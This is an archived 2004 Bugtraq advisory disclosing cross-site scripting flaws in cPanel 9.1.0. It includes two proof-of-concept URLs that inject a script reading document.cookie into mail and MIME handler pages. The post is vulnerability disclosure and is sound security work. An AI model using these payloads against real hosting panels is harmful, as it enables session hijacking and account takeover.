More Cpanel Vuls (cross site scripting)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: More Cpanel Vuls (cross site scripting)
From: Fable <fable@xxxxxxxx>
Date: 23 Mar 2004 17:39:07 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


##################################################
##Advisory Name: More Cpanel Vuls (cross site scripting)
#Discovered by: Fable 
#Greets: 0x29A Crew, !AM Crew, Atomix, d3thstar, mgrd, rootthief.com. 
#Version Tested On: cPanel Build 9.1.0-STABLE 93
##Most likely effects more
##################################################

############
#Description
############        

cPanel & WebHost Manager (WHM) is a next generation web hosting control 
panel system. Both cPanel & WHM are extremely feature rich as well as 
include an easy to use web based interface.

##############
#Vulnerability
##############

After some looking into, I found out that cPanel uses little or no html filters
in their product. It's very simple to inject html in multiple areas in cpanel. 
I'll list the ones I've found so far.


http://site.com:2082/frontend/x/mail/dodelautores.html?email=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://site.com:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=&lt;script&gt;alert(document.cookie&lt;/script&gt;

Note: Those should appear as < script > and < /script > with out the spaces of 
course.

Prev by Date: [waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]
Next by Date: How to crash a harddisk - the Ipswitch WS_FTP Server way
Previous by thread: [waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]
Next by thread: How to crash a harddisk - the Ipswitch WS_FTP Server way
Index(es):
- Date
- Thread